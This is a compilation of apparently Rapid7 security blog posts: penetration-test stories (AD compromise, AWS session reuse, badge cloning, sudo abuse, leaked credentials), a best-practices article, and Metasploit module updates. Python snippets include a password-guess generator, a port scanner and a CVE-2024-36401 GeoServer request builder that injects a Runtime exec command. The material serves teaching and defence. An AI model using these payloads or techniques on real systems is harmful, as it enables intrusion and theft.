Breaking In So You Don’t Have To

Under The Hoodie: The Pen Test Diaries

Each year, Rapid7 penetration testers conduct over 1,000 security assessments, pushing boundaries to expose vulnerabilities before the bad guys do. The mission? Get in, escalate privileges, and own the environment—physically, digitally, or sometimes just by sweet-talking an unsuspecting employee.

Names? Redacted. Companies? Anonymized. But the hacks? Real.

Welcome to Under the Hoodie, where we share stories straight from the frontlines of ethical hacking. Below are real accounts from our testers, revealing just how easy it can be to break into supposedly secure environments. Click through to hear each story unfold.

1. The Law Firm’s "Secure" File Share - Not So Secure

A law firm’s file storage system was sitting on the internet, just begging for a break-in. Using a mix of open-source intelligence (OSINT) and Burp Suite, our pen tester enumerated users, guessed a couple of predictable passwords (think "Winter2024!"), and walked right into confidential legal documents. Verdict? Guilty of weak security.
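Those predictable passwords follow a pattern testers can enumerate mechanically. A minimal sketch of building a "season + year" guess list (the seasons and suffixes are illustrative, not Rapid7's actual wordlist):

```python
# Sketch: generate the predictable "season + year" passwords that
# password-guessing attacks try first. Patterns are illustrative only.
from datetime import date

def seasonal_candidates(year=None):
    year = year or date.today().year
    seasons = ["Winter", "Spring", "Summer", "Fall"]
    suffixes = ["!", "1", "123", ""]
    # Current and previous year, every season, common suffixes
    return [f"{season}{y}{suffix}"
            for y in (year, year - 1)
            for season in seasons
            for suffix in suffixes]

print(seasonal_candidates(2024)[:4])
# ['Winter2024!', 'Winter20241', 'Winter2024123', 'Winter2024']
```

Against an internet-facing login portal, a short list like this plus user enumeration is often all an attacker needs.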

Hear how it happened.

2. Taking Over a College (And Its Campus Police)

Ever wondered how much damage someone could do by simply plugging into an open network jack on a college campus? Turns out, a lot. Our tester started with network poisoning attacks, cracked some hashes, and before long, had access to criminal records, police databases, PhD research, and even student grade records. Could've handed out straight A’s if they wanted.

Check out the full infiltration.

3. Hacking SQL to Crack a Corporate Network

A misconfigured Microsoft SQL server turned out to be the golden ticket for total network compromise. After gaining basic user access via weak credentials, our tester found a juicy SQL cluster, enabled some stored procedures, and pulled off process injection to gain domain admin privileges. Translation? They owned the company’s entire network from the inside out.

Listen to how it was done.

4. Breaking In With Donuts (Social Engineering for the Win)

Sometimes, hacking isn’t about code—it’s about confidence. Armed with a fake badge and a box of popular local donuts, our tester waltzed into a corporate office by leveraging good ol’ human kindness. A security guard even held the door open. The lesson? Free food lowers defenses faster than any zero-day exploit.

Hear about the sugar-powered social engineering.

5. Phishing Calls: One Password Reset Away from Total Control

A single phone call is sometimes all it takes. Our tester posed as an employee needing a password reset. After some casual chit-chat, an IT admin happily provided a fresh login. No brute force, no malware—just old-school social engineering at its finest.

Find out just how easy it was.

6. How We Almost Stole a Police Car

High-security target? Challenge accepted. Our testers, posing as IT consultants, walked right into a police department, were escorted through all secure areas, and even got their hands on a set of keys to a patrol car. No alarms. No suspicion. Just a dangerously believable pretext.

Check out how close they got.

7. The Phish That Netted an Entire Finance Firm’s Data

A fake email, a cloned login page, and a hundred unsuspecting employees. Eight of them entered their credentials, and just like that, our tester had access to financial data, payroll systems, and even proxy rights to other accounts. MFA saved the day—barely.

Find out just how this phishing attack unfolded.

8. Owning a Medical Database Before the Cocoa Cooled

A health transcription company left its web app vulnerable to SQL injection. The result? Full access to sensitive medical records within minutes. The tester reported it immediately, and the company had to shut down its entire system for emergency remediation. All before their hot cocoa had a chance to cool down.

Find out how it happened.

9. No Password? No Problem. Taking Over a Network with NTLM Hashes

No cracked passwords? No worries. Our tester leveraged network sniffing, NTLM relay attacks, and Active Directory Certificate Services to escalate privileges. By the time it was over, they had full control over the company’s systems—without ever knowing a single password.

Check out the full attack.

Security Isn’t a One-Time Fix—It’s a Constant Battle

Every system has weak points—some technical, some human. The goal of penetration testing isn’t just to break in; it’s to make sure real attackers can’t.

Hear more stories from the trenches.

Penetration testing (or “ethical hacking”) is an essential practice for identifying and addressing security vulnerabilities in systems, networks, and applications. By simulating real-world cyberattacks, organizations can proactively assess their defenses and strengthen their cybersecurity posture. However, penetration testing requires skill, precision, and adherence to best practices to be effective. Below, we outline key best practices to ensure penetration tests are thorough, ethical, and lead to meaningful security improvements.

1. Define Clear Objectives and Scope

Before conducting any penetration test, it’s crucial to set clear objectives and boundaries. This includes:

• Scope: Clearly define which systems, applications, networks, or devices are to be tested. This helps prevent any accidental damage to systems outside of the agreed-upon boundaries.

• Goals: Establish what you want to achieve, whether it’s identifying vulnerabilities, testing incident response plans, or evaluating the effectiveness of specific security controls.

• Rules of Engagement: Define how the test will proceed, the hours during which testing will occur, and the severity of potential risks. This ensures alignment between the penetration testers and the organization, minimizing disruption.

Establishing these guidelines at the start ensures the test is comprehensive, focused, and aligned with organizational priorities.

2. Engage a Skilled and Certified Penetration Testing Team

A penetration test is only as good as the professionals executing it. Ensure that the penetration testers have the necessary expertise and certifications, such as:

•    Certified Ethical Hacker (CEH)
•    Offensive Security Certified Professional (OSCP)
•    Certified Information Systems Security Professional (CISSP)

These certifications, among others, demonstrate a high level of competence in identifying and exploiting security weaknesses. Ideally, testers should also have experience with the specific technology stack used by your organization, whether it’s web applications, mobile devices, or complex network infrastructures.

3. Utilize a Multi-Stage Testing Approach

Penetration testing is more effective when it is conducted in phases. A common multi-stage approach includes:

•    Reconnaissance: The tester gathers information on the target, including publicly available data (such as domain names, IP addresses, and employee information) to identify potential entry points.

•    Scanning and Enumeration: Testers scan the target environment for known vulnerabilities and map out potential weak spots in networks, applications, or infrastructure.

•    Exploitation: This phase involves attempting to exploit discovered vulnerabilities. Ethical hackers may attempt to bypass authentication systems, inject malicious code, or escalate privileges, depending on the agreed-upon scope.

•    Post-Exploitation: After a vulnerability has been successfully exploited, testers assess the potential for lateral movement within the network and determine the extent of the access gained.

•    Reporting and Remediation: At the conclusion of the test, a comprehensive report is provided, detailing findings, exploited vulnerabilities, and suggested remediation steps. A clear remediation strategy is essential to help the organization strengthen its defenses.
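The scanning phase above can be sketched in a few lines. A real engagement would use purpose-built tools such as Nmap, but a minimal TCP connect scan looks like this (host and port list are placeholders; scan only systems you are authorized to test):

```python
# Sketch of the scanning phase: a minimal TCP connect scan.
# Target and ports are placeholders; only scan authorized hosts.
import socket

def tcp_connect_scan(host, ports, timeout=0.5):
    open_ports = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                open_ports.append(port)  # connection succeeded: port is open
        except OSError:
            pass  # closed, filtered, or unreachable
    return open_ports

# Example: check a few common service ports on a lab host.
print(tcp_connect_scan("127.0.0.1", [22, 80, 443, 3389]))
```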

4. Simulate Real-World Attacks (Red Teaming)

While traditional penetration testing focuses on identifying vulnerabilities, Red Teaming takes things a step further by simulating full-scale, real-world cyberattacks. Red teams act like real-world adversaries and work to bypass physical security, compromise systems, and exploit organizational weaknesses. They test not only technical security but also human factors (e.g., social engineering attacks) and organizational response capabilities.

By conducting regular Red Team assessments, organizations can better understand their overall cybersecurity readiness, including how well they detect, respond to, and recover from attacks.

5. Test Across Multiple Vectors (Web, Network, and Social Engineering)

Comprehensive penetration testing involves testing across several attack vectors. This can include:

•    Web Application Testing: Identify vulnerabilities like SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), and insecure APIs.

•    Network Testing: Assess the security of your internal and external networks, identifying weak spots like open ports, misconfigurations, and outdated software.

•    Social Engineering: Attackers often exploit human weaknesses to gain access. Testing for phishing, vishing (voice phishing), and pretexting can help organizations recognize and respond to social engineering tactics.

Testing across these various vectors ensures that all potential entry points are considered and adequately protected.
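To make the web-application vector concrete, here is a self-contained sketch of SQL injection using an in-memory SQLite database (schema and data are invented): the string-built query is injectable, while the parameterized one is not.

```python
# Demonstrates SQL injection with an in-memory SQLite database.
# Schema and data are made up for illustration.
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, secret TEXT)")
db.execute("INSERT INTO users VALUES ('alice', 's3cret'), ('bob', 'hunter2')")

def lookup_unsafe(name):
    # VULNERABLE: attacker-controlled input concatenated into SQL
    return db.execute(f"SELECT secret FROM users WHERE name = '{name}'").fetchall()

def lookup_safe(name):
    # SAFE: the placeholder keeps the input as data, not SQL
    return db.execute("SELECT secret FROM users WHERE name = ?", (name,)).fetchall()

payload = "x' OR '1'='1"
print(lookup_unsafe(payload))  # dumps every secret in the table
print(lookup_safe(payload))    # returns nothing
```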

6. Adhere to Legal and Ethical Standards

Penetration testing must be conducted within the boundaries of the law and ethical guidelines. Always obtain written permission from the organization to conduct the test and ensure that:

•    Consent is obtained: Without explicit authorization, penetration testing can be considered illegal hacking.

•    No damage is caused: Ethical hackers should take care to avoid causing disruptions to business operations or breaching privacy regulations (such as GDPR or HIPAA).

•    Confidentiality is maintained: Sensitive data accessed during the test must be handled with strict confidentiality. Testers should never disclose vulnerabilities to unauthorized parties.

Working within these ethical and legal boundaries protects both the testers and the organization.

7. Continuous Communication and Collaboration

Penetration testing isn’t a one-off exercise; it should be part of an ongoing, iterative process to improve security. Regular communication between the penetration testing team and the organization’s security team is vital. A collaborative approach allows both parties to:

•    Address issues promptly: Penetration testers should notify the organization of any critical vulnerabilities discovered during testing, allowing them to take immediate action.

•    Iterate testing: Penetration testing should be repeated regularly, especially after significant changes in the system, infrastructure, or software.

•    Enhance response plans: Use the results of each penetration test to improve incident response and security protocols.

8. Ensure Thorough Reporting and Actionable Remediation Plans

The final report from a penetration test should be comprehensive, clear, and actionable. Key elements of a good penetration testing report include:

•    Executive Summary: High-level findings, including the potential risks to the business.
•    Detailed Findings: A breakdown of vulnerabilities discovered, with evidence (screenshots, logs) to support the findings.
•    Risk Assessment: Categorization of vulnerabilities based on their potential impact and likelihood of exploitation.
•    Remediation Recommendations: Clear, prioritized suggestions for fixing vulnerabilities, improving security practices, and strengthening defenses.

The remediation plan should be specific, actionable, and realistic, with timelines for addressing critical issues.

9. Retest After Remediation

Once vulnerabilities are remediated, it’s important to retest the system to ensure that fixes have been properly applied and no new vulnerabilities have been introduced. This can be done through a follow-up penetration test or a vulnerability assessment, depending on the scope of the changes made.

Conclusion

Penetration testing is a crucial aspect of any organization’s cybersecurity strategy, enabling it to identify and address vulnerabilities before malicious actors can exploit them. By following these best practices—setting clear objectives, engaging skilled testers, adopting a multi-phase approach, and fostering continuous collaboration—organizations can significantly enhance their security posture and reduce the risk of data breaches, financial loss, and reputational damage.

Remember, cybersecurity is an ongoing effort. Regular penetration testing, in combination with a strong security culture, will help organizations stay ahead of evolving threats in the ever-changing digital landscape.

The post Best Practices in Penetration Testing: Ensuring Robust Security appeared first on Cybersecurity Insiders.

Keys to the Kingdom - Gaining access to the Physical Facility through Internal Access

This is a story of network segmentation and the impact that seemingly trivial misconfigurations can have on your organization. Every so often an engagement shows just how far a small oversight can cascade, and this was one of those occasions.

This particular pen test asked for a goals-based assessment focusing on post-compromise activities — an attempt by the client to discover how vulnerable internal systems were to lateral movement by an attacker who had already compromised the domain. Among the goals was a request to attempt to compromise the client’s Amazon Web Services (AWS) infrastructure, and a secondary request to access and exploit any systems discovered to contain sensitive or critical operational data.

The domain for the internal environment was compromised within an hour and a half using common attack vectors: Responder network poisoning to obtain low-level network credentials, followed by exploitation of Active Directory Certificate Services (ADCS) web enrollment vulnerabilities to escalate to membership in the ‘Domain Administrators’ group. While performing credential-stuffing attacks against several devices within the network to determine what previously compromised user accounts could access, it was noted that the testing device could reach subnets containing user devices due to a lack of segmentation and access control policies. Segmentation and access controls provide additional layers of security that can help mitigate damage after a compromise by preventing attacker movement toward sensitive resources within the network.

Upon initially attempting to access the company’s confidential Google Suite resources, it was found that all requests redirected to a required Multi-Factor Authentication (MFA) request. Additionally, Remote Desktop Protocol (RDP) services had been properly secured, preventing sessions from the network of the attacking device.

Devices within the user environment were accessed using Impacket, a common suite of testing tools that helps penetration testers assess Windows environments and connect to devices with compromised credentials. Using the ‘wmiexec’ script provided within the suite to explore the file system of a known Software Architect’s machine, a hidden AWS folder was discovered. This folder contained credential files holding what appeared to be a recently authenticated and currently active AWS session. Testing the credentials from the attacking machine led to two discoveries:

  1. The account was an administrator to a testing and development AWS environment
  2. This session had already authenticated through MFA
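Credential files like the ones discovered follow the standard AWS credentials INI format, which is trivial to parse once read off the machine. A sketch (the profile name and key values are fabricated):

```python
# Sketch: parsing the standard ~/.aws/credentials INI format that the
# hidden AWS folder contained. Profile and key values are fabricated.
import configparser

SAMPLE = """
[default]
aws_access_key_id = AKIAEXAMPLEEXAMPLE
aws_secret_access_key = fakeSecretKeyForIllustrationOnly
aws_session_token = fakeSessionToken
"""

def read_aws_profiles(text):
    parser = configparser.ConfigParser()
    parser.read_string(text)
    return {name: dict(parser[name]) for name in parser.sections()}

profiles = read_aws_profiles(SAMPLE)
# A session token alongside the keys indicates temporary (often
# MFA-backed) credentials, like the active session found here.
print("aws_session_token" in profiles["default"])  # True
```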

Using a tool called ‘aws_consoler’, a session was generated to allow for administrative access to the AWS Console. As MFA sessions within AWS expire within an hour by default, the first action performed with this session was to create a user account. The new account gave persistent access to the environment without needing to rely on another session credential file being obtained. While exploring virtual machines deployed within AWS, it was noted that there appeared to be no network filtering of RDP between the internal environment and the AWS environment.

An in-browser RDP session within AWS provided a graphical user interface on the EC2 instance for a server on a separate network, which then allowed an RDP chain to be established to user devices. Upon connection to a user device, active authenticated sessions to multiple confidential resources, including event monitoring systems and GitLab, were discovered. Further enumeration revealed something to pique the interest of any tester: access to the company’s secrets vault, which in turn allowed access to a device with ‘Security’ in the name. This was surely an opportunity no tester would ever willingly pass up.

After successful authentication to the machine, the mother lode was discovered: unrestricted feeds of all cameras on the campus, unrestricted access to file shares, and, most importantly, access to the badge printing system. Through the camera feeds, the data center could be analyzed for any physical vulnerabilities which might allow physical access to the servers. Within the file shares, multiple files were discovered detailing physical security in such granularity that it could be determined which rooms were left unlocked after business hours. A file was also discovered containing the door PIN codes and alarm codes for every employee, as well as the combination to the Network Operations Center’s (NOC) physical key safe.

This left only one piece of information needed to access the facility unimpeded: the badge. Exploring the badge printing system, the format used in badge creation was discovered to be 26-bit Wiegand. This made it a simple task to create a working access badge, as all the data needed to create one within the system had been obtained: the facility code and badge ID of the impersonated user. Both pieces of information existed within the system for a user with free access to the entire facility and data center. Using the acquired data, the hex value that would be written to the card during badge creation was synthesized, and the card was created using the popular Proxmark RFID tool. The picture used on the badge was also acquired during enumeration, allowing the created badge to be a high-quality facsimile of the user’s own card.

With this we had the card, the door PINs, and the alarm codes — all of the pieces needed to infiltrate the campus undetected and without restriction, a malicious actor’s dream. Add access to the NOC key safe, which would lead to data center access, as the cherry on top. All from one door control and badge system device which had not been properly protected, combined with a lack of proper segmentation and access controls.

Penetration testers typically approach physical assessments from the angle of internal network access resulting from a physical breach; this engagement shows it is also possible to breach the facility with information obtained from an internal network breach, flipping the situation around completely. This access could be devastating to a company reliant on 24/7 business continuity, especially for clients who use and maintain Operational Technology (OT) on their campus. A network breach could lead to an attacker selling off the ‘keys to the kingdom,’ leading to additional physical and network breaches further down the line. When reviewing your internal environment, make sure to properly protect and segment critical security devices, and ensure adequate protections are in place on sensitive files and documents as well.

Details Matter: Pentesting a single device to guarantee security

Rapid7’s penetration testing services regularly assess internal networks of various sizes. For this particular engagement, however, Rapid7 was tasked with performing a penetration test of just one device on an internal network.

The device was being piloted for future deployment and the customer had specific concerns around the security posture of the device. Specifically, the customer tasked Rapid7 with three focus areas: First, ensure the device could not reach any hosts on a separate, segmented network. Second, ensure the standard user provided to Rapid7 could not elevate privileges and gain root access to the device. Third, ensure no unauthorized tools could be downloaded onto the device.

Beginning with segmentation validation, Rapid7 logged on to the device with the provided credentials, using the dynamic proxy option. This allowed Rapid7 to run port scans from the deployed Penetration Testing Kit (PTK) with the traffic routed through the device before reaching the segmented network. Rapid7 was only able to interact with hosts on the other network over ICMP and could not log in to or otherwise interact with the hosts. The current configuration of the device therefore appeared to address the customer’s first concern by preventing interaction with other hosts.

Moving to privilege escalation, Rapid7 enumerated the device with the provided credentials. One step during this enumeration was to check which commands, if any, the standard user could run as root using the Linux command sudo. Among the available commands were a handful of Bash scripts. Rapid7 reviewed the permissions set on those Bash files and found an installation script was configured to only allow the low privilege user to execute the script and did not allow for reading or writing of the script. However, Rapid7 also observed this restricted file was owned by the low privilege user, which allowed modifying the permissions on the script. Rapid7 created a backup of the script and then modified the script to launch a new Bash shell. Running this modified script with sudo provided Rapid7 with root access to the device.
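The underlying misconfiguration is simple to audit for: any script that sudo will run as root must not be owned by the unprivileged user, or that user can change its permissions and its contents. A rough check, assuming the list of sudo-permitted paths has already been gathered (for example from 'sudo -l'); the audited file here is a fabricated temp file:

```python
# Sketch: flag sudo-allowed scripts whose ownership lets the invoking
# user change their permissions (and therefore their contents).
# The path list would come from `sudo -l`; here we fabricate one file.
import os, stat, tempfile

def risky_sudo_scripts(paths, uid):
    risky = []
    for path in paths:
        st = os.stat(path)
        # Owned by the low-privilege user: they can chmod it writable,
        # edit it, and have sudo run their code as root.
        if st.st_uid == uid or (st.st_mode & stat.S_IWOTH):
            risky.append(path)
    return risky

with tempfile.NamedTemporaryFile(suffix=".sh", delete=False) as f:
    f.write(b"#!/bin/bash\necho install\n")
print(risky_sudo_scripts([f.name], os.getuid()))  # flags the file we own
```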

Enumeration of the device with root access revealed a strong firewall configuration in place, which prevented the device from communicating with the segmented network or with external websites. With root access, however, Rapid7 disabled the firewall on the device and could then connect to hosts on the other network as well as install additional, unauthorized tools.

This engagement highlighted the importance of attention to detail when hardening systems. The file ownership misconfiguration on the script enabled Rapid7 to defeat all three of the protections the customer had asked to have validated. The penetration test report provided by Rapid7 to the customer demonstrated the impact of the misconfiguration and outlined recommended remediation steps to secure the device.

Buying Stuff For Free From Shopping Websites

Rapid7 is often tasked with evaluating the security of e-commerce sites. When dealing directly with customer financials, the security of these transactions is a top concern. Fortunately, there are ample pre-built e-commerce platforms one can simply purchase or install. From an attacker’s perspective, these are annoying to attack since they're tested so often by the vendors maintaining the e-commerce platform.

So how do you exploit a site that’s already been thoroughly tested? There are many ways, but we’ll go over two.

One exploitation path is through insecure custom code added to the e-commerce framework. Often, the framework won't cover a business need of the organization out of the box, and it's up to your team to create custom code for it. If this code isn't tested and secure, there’s a chance a vulnerability will be introduced.

Another way is the leaking of secrets or guessable credentials (yes, it still happens in 2024). Think an admin password sitting somewhere it shouldn't be, credentials sold underground after a data breach, or a password that’s just the company name.

A web application security scanner can easily find straightforward vulnerabilities, such as outdated software, but other types often require a more human touch.

What follows are two real-world examples from the Rapid7 Penetration Testing team.

Site 1 - Insecure Custom Code:

The site we were testing was geared toward both businesses and consumers using a moderately customized e-commerce platform. Business customers received special offers and bulk deals, while non-business customers didn’t. The first instinct here is to sign up as a fake business in order to get discounted products. Easy, right? But this wasn’t possible because business customers were verified manually by the site’s sales team before they could create an account, verifying the customer by asking for an account ID and invoice ID from a previous purchase. Business accounts had the ability to assign roles within their account to other users, so sales users under the business account could be configured by admin users within the business account. In theory, everyday consumers had no way of getting a business account.

As our testing continued, this functionality stayed in the back of our minds while the application was enumerated to find other functionality. The more complex the site becomes, the more functionality exists to be found, and the more likely a vulnerability is to exist. Enumeration is a tedious process, but it answers questions like: What’s in the JavaScript files? How are invoices served? How did the developers plan the authentication flow? Are there quirks with the website framework that the developers didn't think about? Every factor is considered, because you can't hack it without understanding it. Even if you don't know the code, you have to at least guess what's going on.

Eventually we found an API request in the site's JavaScript which returned the account ID of your current company along with the last 10 invoice IDs. This was not that interesting, since we didn't have a company account, so it was assumed it wouldn’t return anything. After leaving it on the backburner for a while we thought, “let’s run it anyway... for fun.”

We discovered we could create a modified version of the request that returned a company ID and 10 invoice IDs. Running the request from a separate consumer account returned the same IDs, which could only mean one thing: one business account contained a large number of individual consumers as users.

Once the IDs were found we went through the business account creation flow as the average business user would with the two IDs. The result was admin privileges over every consumer user — all 11,000 of them. This also allowed access to user addresses, phone numbers, emails, and even invoices.

From here, it would be fairly trivial to buy things as other users by managing their settings.

This vulnerability was reported to the client and mitigated by requiring business users to go through a more stringent verification process.
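The root cause was a missing object-level authorization check: the endpoint returned a company's IDs to callers who were not members of that company. A toy sketch of the check that was absent (the data model and names are invented):

```python
# Sketch of the missing authorization check: the invoice-ID endpoint
# should verify the caller actually belongs to the business account.
# Data model and names are invented for illustration.
ACCOUNTS = {"biz-1": {"members": {"alice"}, "invoices": ["INV-100", "INV-101"]}}

def get_invoices(account_id, caller):
    account = ACCOUNTS[account_id]
    if caller not in account["members"]:   # the check that was missing
        raise PermissionError("caller is not a member of this account")
    return account["invoices"]

print(get_invoices("biz-1", "alice"))     # member: allowed
# get_invoices("biz-1", "mallory") would raise PermissionError
```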

Site 2 - Leaked Credentials:

This site was just a normal e-commerce site; you log in, buy the product you need, and log out. That’s it. It had virtually no custom code implemented, so most of the site was limited to the standard functionality that came with the framework. Not much complexity meant not much room to play around with vulnerabilities.

Even though few high severity vulnerabilities were found, it is important that every avenue for exploitation be attempted — within scope, of course.

This includes open source intelligence (OSINT), and when it comes to web applications there's plenty to look for.

For web applications, this typically comes down to searching Google and Wayback Machine for URLs. From a hacker's perspective, it's a good idea to have as many URLs as possible to access just to increase the attack surface. One can’t really hack a website if one doesn't know its URL.

Another target to search is the developer’s previous projects. Any code they’ve ever written becomes fair game, and you can often find code posted online related to the thing you're hacking. That is exactly what we found: a developer was posting test code in a public GitHub repo and included a folder they shouldn’t have. Inside this testing code were credentials to pull the source code for the real site from another code repository site.
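Hunting for this kind of leak can be partially automated by pattern-matching file contents, which is roughly what dedicated secret scanners do. A toy sketch (the patterns and the sample "committed" text are illustrative):

```python
# Toy secret scanner: grep file contents for common credential shapes.
# Patterns and the sample "committed" text are illustrative only.
import re

PATTERNS = {
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "password_assignment": re.compile(r"(?i)password\s*[:=]\s*\S+"),
    "private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}

def scan_text(text):
    return [name for name, rx in PATTERNS.items() if rx.search(text)]

committed = 'repo_user = "dev"\nrepo_password = "hunter2"  # oops\n'
print(scan_text(committed))  # ['password_assignment']
```

Running a scan like this over your own public repos before an attacker does is cheap insurance.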

Inside that source code for the site were approximately 5,000 gift card codes, worth an average of $200 each.

This vulnerability was reported to the client and was mitigated by simply deleting the GitHub repository and changing the leaked credentials.

Conclusion

These are just two examples of what a successful pen test of an e-commerce site looks like. Most e-commerce platforms are heavily tested for security issues since they hold payment information, but custom code and configurations can often create security holes due to the additional complexity. An extremely complex exploit chain isn't always necessary to achieve a high financial impact. All it really takes is a solid understanding of enumeration and a hacker's mindset for spotting potential security holes.

GeoServer Unauthenticated RCE

Metasploit Weekly Wrap-Up 7/19/2024

This week, contributor h00die-gr3y added an interesting exploit module that targets the GeoServer open-source application, software used to view, edit, and share geospatial data. Versions prior to 2.23.6, between 2.24.0 and 2.24.3, and between 2.25.0 and 2.25.1 unsafely evaluate property names as XPath expressions, which can lead to unauthenticated remote code execution. This vulnerability is identified as CVE-2024-36401 and affects all GeoServer instances. It has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic, and WPS Execute requests.
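Public advisories for CVE-2024-36401 show the vulnerable property-name evaluation being reached through an ordinary OGC request parameter. As a sketch based on those published proof-of-concept shapes, a WFS GetPropertyValue probe URL can be assembled like this (the host, layer name, and command are placeholders; use only against systems you are authorized to test):

```python
# Sketch: building the WFS GetPropertyValue request shape shown in
# public advisories for CVE-2024-36401. Host, typeNames value, and
# command are placeholders; use only against authorized targets.
from urllib.parse import urlencode

def build_probe(base_url, type_name, command):
    params = {
        "service": "WFS",
        "version": "2.0.0",
        "request": "GetPropertyValue",
        "typeNames": type_name,
        # Property name evaluated as an XPath expression by vulnerable versions
        "valueReference": f"exec(java.lang.Runtime.getRuntime(),'{command}')",
    }
    return f"{base_url}/geoserver/wfs?{urlencode(params)}"

print(build_probe("http://target.example", "sf:archsites", "id"))
```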

New module content (1)

GeoServer Unauthenticated Remote Code Execution

Authors: Steve Ikeoka, h00die-gr3y, and jheysel-r7
Type: Exploit
Pull request: #19311 contributed by h00die-gr3y
Path: multi/http/geoserver_unauth_rce_cve_2024_36401
AttackerKB reference: CVE-2024-36401

Description: This adds an exploit module for CVE-2024-36401, an unauthenticated RCE vulnerability in GeoServer versions prior to 2.23.6, between 2.24.0 and 2.24.3, and in 2.25.0 and 2.25.1.

Enhancements and features (1)

  • #19325 from pmauduit - Updates the TARGETURI description for the geoserver_unauth_rce_cve_2024_36401 module.

Bugs fixed (3)

  • #19322 from dledda-r7 - This fixes an issue that was causing some Meterpreters to consume large amounts of memory when configured with an HTTP or HTTPS transport that was unable to connect.
  • #19324 from adfoster-r7 - This updates the rpc_session library such that RPC-compatible modules are able to handle unknown sessions, i.e. rpc.call('session.compatible_modules', -1).
  • #19327 from dledda-r7 - This bumps the version of metasploit_payloads-mettle to pull in changes for the Linux and OS X Meterpreters. The changes fix an issue which prevented the sniffer extension from loading.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Are You Looking for ACTION?

Metasploit Wrap-Up 12/8/2023

Our very own adfoster-r7 has added a new feature that adds module actions, targets, and aliases to the search feature in Metasploit Framework. As we continue to add modules with diverse goals or targets, we’ve found ourselves leaning on these flags more and more recently, and this change will help users better locate the modules that let them do what they want.

Right now, the feature is behind a feature flag as we work out how to make it as user-friendly as possible. If you would like to use it, turn on the feature by running features set hierarchical_search_table true. Please let us know how it works for you!

New module content (2)

ownCloud Phpinfo Reader

Authors: Christian Fischer, Ron Bowes, creacitysec, h00die, and random-robbie
Type: Auxiliary
Pull request: #18591 contributed by h00die
Path: gather/owncloud_phpinfo_reader

Description: This adds an auxiliary module for CVE-2023-49103 which can extract sensitive environment variables from ownCloud targets including ownCloud, DB, Redis, SMTP, and S3 credentials.

Docker cgroups Container Escape

Authors: Kevin Wang, T1erno, Yiqi Sun, and h00die
Type: Exploit
Pull request: #18578 contributed by h00die
Path: linux/local/docker_cgroup_escape

Description: This adds a new module to exploit CVE-2022-0492, a docker escape for root on the host OS.

Enhancements and features (5)

  • #17667 from h00die - Makes various performance and output readability improvements to Metasploit's password cracking functionality. Now, hash types without a corresponding hash are skipped, invalid hashes are no longer output, cracking stops for a hash type when there are no hashes left, and empty tables are no longer printed. Other code optimizations include added support for Hashcat username functionality, a new quiet option, and documentation updates to the wiki.
  • #18446 from zeroSteiner - This makes the DomainControllerRhost option optional, even when the authentication mode is set to Kerberos. It does so by looking up the Kerberos server using the SRV records that Active Directory publishes by default for the specified realm.
  • #18463 from h00die-gr3y - This updates the linux/upnp/dlink_upnp_msearch_exec exploit module to be more generic and adds advanced detection logic (a check method). The module leverages a command injection vulnerability that exists in multiple D-Link network products, allowing an attacker to inject arbitrary commands into the UPnP service via a crafted M-SEARCH packet. This also deprecates the modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi module, which uses the same attack vector and can be replaced by this updated module.
  • #18570 from adfoster-r7 - Updates Metasploit's Docker ruby version from 3.0.x to 3.1.x.
  • #18581 from adfoster-r7 - Adds hierarchical search table support to Metasploit's search command functionality. The search table now includes a module's actions, targets, and alias metadata. This functionality requires the user to opt-in with the command features set hierarchical_search_table true.

Bugs fixed (1)

  • #18603 from h00die - Updates the auxiliary/scanner/snmp/snmp_enum and auxiliary/scanner/snmp/snmp_login module metadata to include metadata references to CVE-1999-0516 (guessable SNMP community string) and CVE-1999-0517 (default/null/missing SNMP community string).

Documentation added (1)

  • #18592 from loredous - Fixes a typo in the SMB pentesting documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

PenTales: What It’s Like on the Red Team

At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re sharing some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

Performing a Red Team exercise at Rapid7 is a rollercoaster of emotions. The first week starts off with excitement and optimism, as you have a whole new client environment to dig into. All assets and employees are in scope, no punches pulled. From a hacker mentality, it's truly exciting to be unleashed, with unlimited possibilities bouncing around in your head of how you'll breach the perimeter, establish persistence, move laterally, and access the company "crown jewels."

Then the first week comes to a close and you realize this company has locked down their assets, and short of developing and deploying a 0-day, you're going to have to turn to other methods of entry, such as social engineering. Excitement dies down but optimism remains, until that first phish is immediately burned. Then the second falls flat. Desperation to "win" kicks in and you find yourself working through the night, trying to find one seemingly nonexistent issue in their network, all in the name of getting that first foothold.

One of our recent Red Teams followed this emotional rollercoaster to a 'T'. We were tasked with compromising a software development company with the end goal of obtaining access to their code repositories and cloud infrastructure. We had four weeks, two Rapid7 pen test consultants, and a lot of Red Bull at our disposal to hack all the things. We spent the first two days performing Open Source Intelligence (OSINT) gathering. This phase was a method of passive reconnaissance, in which we scoured the internet for publicly accessible information about our target company. Areas of interest included public network ranges owned by the company, domain names, recent acquisitions, technologies used within the company, and employee contact information.

Our OSINT revealed that the company was cloud-first with a limited external footprint. They had a few HTTPS services with APIs for their customers, software download portals, customer ticketing systems, the usual. Email was cloud hosted in Office365, with Single Sign-On (SSO) handled through Okta and protected by Multi-Factor Authentication (MFA). The only other external employee resources were an Extranet page that required authentication and a VPN portal that required MFA and a certificate.

